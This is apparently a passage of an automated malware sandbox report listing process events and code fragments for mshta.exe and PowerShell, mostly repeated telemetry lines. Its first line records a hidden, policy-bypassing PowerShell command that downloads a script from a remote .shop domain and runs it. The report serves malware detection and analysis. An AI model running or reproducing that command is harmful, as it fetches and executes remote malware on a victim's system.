              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A21873 push es; iretd 4_2_06A21874
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A3BA15 push es; ret 4_2_06A3BA24
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A390B3 push es; ret 4_2_06A390B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A72CB9 push es; iretd 4_2_06A72DB4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A72C5C push es; ret 4_2_06A72CB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A72C5C push es; iretd 4_2_06A72DB4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7C500 push es; ret 4_2_06A7C540
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7C839 push es; retf 4_2_06A7C848
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7C865 push es; iretd 4_2_06A7C868
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7C983 push es; ret 4_2_06A7C984
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7C9EF push es; retf 4_2_06A7C9F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA66F8 pushfd ; retf 4_2_06FA66F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FAE28E push es; iretd 4_2_06FAE298
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA6E38 push esp; iretd 4_2_06FA6E39
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FAF9B8 pushfd ; ret 4_2_06FAF9B9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_070C178A push edi; iretd 4_2_070C17AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_070CAD84 push ds; ret 4_2_070CAD8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A960 push es; retf 10_2_0044A966
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A969 push es; retf 10_2_0044A96A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A349 push es; retf 10_2_0044A34A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A35C push es; retf 10_2_0044A32A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00449B00 push ecx; iretd 10_2_00449B01
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A328 push es; retf 10_2_0044A32A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A3C1 push es; retf 10_2_0044A3C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A3E9 push es; retf 10_2_0044A3EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042D380 push ds; ret 10_2_0042D381
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044AC4D push 00000005h; ret 10_2_0044AC54
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044A45D push es; retf 10_2_0044A462
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00441480 push eax; mov dword ptr [esp], 848786B9h10_2_00441481
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00445E2A push cs; iretd 10_2_00445E2D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00447725 push ds; retf 10_2_00447759
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
